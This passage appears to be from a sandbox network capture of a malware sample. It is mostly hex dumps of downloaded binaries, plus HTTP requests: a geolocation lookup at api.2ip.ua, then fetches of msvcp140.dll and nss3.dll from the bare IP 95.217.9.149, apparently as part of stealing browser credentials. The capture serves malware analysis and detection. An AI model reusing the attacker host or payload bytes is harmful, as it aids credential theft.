a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-23 23:44:59 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:45:00 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-23 23:45:01 UTC	895	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:45:01 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8C0kzDfFJgtXWKAZf4m%2FZZYVwWSk1clMLcBEUq%2FjDGL19AYOlcRHO3cObmM%2F9A5IpUg4NLoGUlgQxKlUSf7MwBsMRFMwCuM%2FGQq30%2FnUWwf7dOXwDO3La6G%2FZ4Vt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8791b98c4dde2b74-LAX alt-svc: h3=":443"; ma=86400
2024-04-23 23:45:01 UTC	405	IN	Data Raw: 31 38 65 0d 0a 7b 22 69 70 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 34 5c 75 30 34 33 30 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c Data Ascii: 18e{"ip":"154.16.105.36","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Nevada","region_rus":"\u041d\u0435\u0432\u0430\u0434\u0430","region_ua":"\u041d\u0435\u0432\
2024-04-23 23:45:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:45:01 UTC	157	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Cache-Control: no-cache
2024-04-23 23:45:02 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:45:01 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-23 23:45:02 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c Data Ascii: MS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
2024-04-23 23:45:02 UTC	16384	IN	Data Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 Data Ascii: uF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|iqY(R
2024-04-23 23:45:03 UTC	16384	IN	Data Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:45:04 UTC	153	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.9.149 Cache-Control: no-cache
2024-04-23 23:45:05 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 23:45:04 GMT Content-Type: application/octet-stream Content-Length: 2046288 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-1f3950" Accept-Ranges: bytes
2024-04-23 23:45:05 UTC	16136	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-04-23 23:45:05 UTC	16384	IN	Data Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18 Data Ascii: i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQAQ
2024-04-23 23:45:05 UTC	16384	IN	Data Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85 Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
